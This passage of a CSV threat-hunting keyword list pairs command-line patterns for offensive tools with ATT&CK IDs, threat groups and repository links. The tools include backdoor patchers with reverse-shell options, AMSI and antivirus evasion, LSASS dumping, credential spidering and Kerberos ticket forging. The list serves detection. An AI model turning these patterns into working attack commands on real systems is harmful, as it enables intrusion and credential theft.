Evasion,https://github.com/bats3c/darkarmour,1,0,N/A,10,7,644,119,2020-04-13T10:56:23Z,2020-04-06T20:48:20Z -* -f *.exe -m onionduke -b *.dll*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,0,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -* -f *.exe -m onionduke -b *.exe*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,0,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -* -f *.ps1 -l 3 -o *.ps1 -v -t powershell*reverse*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,0,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -* -f Find-AllVulns*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,0,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z -* -f Find-PathDLLHijack*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,0,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z -* -f Get-DomainGroupMember* -a *-Identity *admin* -Recurse*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,0,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z -* -f Invoke-Inveigh*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,0,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z -* -f kirbi *,offensive_tool_keyword,krbrelayx,Kerberos unconstrained delegation abuse toolkit,T1558.003 - T1098,TA0004 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dirkjanm/krbrelayx,1,0,N/A,N/A,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -* -f passw -e xlsx csv *,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -* -f passw user admin account network login logon cred *,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -* -f psexec.exe -H * -P * -s reverse_shell_tcp*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,0,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -* -f shells/generic1.ps1 *,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,0,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -* -f tcpview.exe -s iat_reverse_tcp_inline -H * -P * -m automatic -C*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,0,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -* -f TeamViewer.exe -H * -P * -s *,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,0,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -* -FakeCmdLine *,offensive_tool_keyword,cobaltstrike,EDR Evasion - Combination of SwampThing - TikiTorch,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rkervella/CarbonMonoxide,1,0,N/A,10,10,21,12,2020-05-28T10:40:20Z,2020-05-15T09:32:25Z -* -FakeCmdLine *,offensive_tool_keyword,SwampThing,SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones,T1036.005 - T1564.002,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing,1,0,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -* -FakeDC * -SamAccountName * -Username *,offensive_tool_keyword,AD exploitation cheat sheet,DCShadow is an attack that masks certain actions by temporarily imitating a Domain Controller. If you have Domain Admin or Enterprise Admin privileges in a root domain it can be used for forest-level persistence.,T1550 - T1555 - T1212 - T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* fcrdns.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --file ownedusers.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --file-smuggler-port *,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,0,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -* filetransfer -download -src-file *.exe*/tmp*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,0,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -* filetransfer -upload -src-file *.exe*\temp*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,0,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -* FileZillaPwd*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* finger.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* fingerprint-strings.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* firewalk.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* firewall-bypass.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* flash.bat*,offensive_tool_keyword,Zloader,Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike,T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204,TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003,N/A,N/A,Exploitation tools,https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -fluctuate=NA -sleep=*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* -fluctuate=RW -sleep=*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* flume-master-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --flush-attacks*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,0,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -* follina.py *,offensive_tool_keyword,POC,Just another PoC for the new MSDT-Exploit,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/ItsNee/Follina-CVE-2022-30190-POC,1,0,N/A,N/A,1,5,0,2022-07-04T13:27:13Z,2022-06-05T13:54:04Z -* -force-forwardable,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* --force-kerb *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* --force-ps32,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* forgeTGT(*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,0,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -* --fork --write *.dmp*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -* --format exe * --jitter *,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -* --format kirbi*,offensive_tool_keyword,krbrelayx,Kerberos unconstrained delegation abuse toolkit,T1558.003 - T1098,TA0004 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dirkjanm/krbrelayx,1,0,N/A,N/A,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -* -format=bof *.exe*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* -format=bof -cleanup *,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* -format=dotnet -sleep=*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* -format=dotnet-pinvoke *,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* --format=krb5asrep* --wordlist=*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* --format=netntlmv2 *.txt*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* --format=NT -w=*_password.txt*,offensive_tool_keyword,JohnTheRipper,John the Ripper is a fast password cracker.,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/magnumripper/JohnTheRipper,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* -format=reflective-dll *.exe*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* -format=service-dll *.exe*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 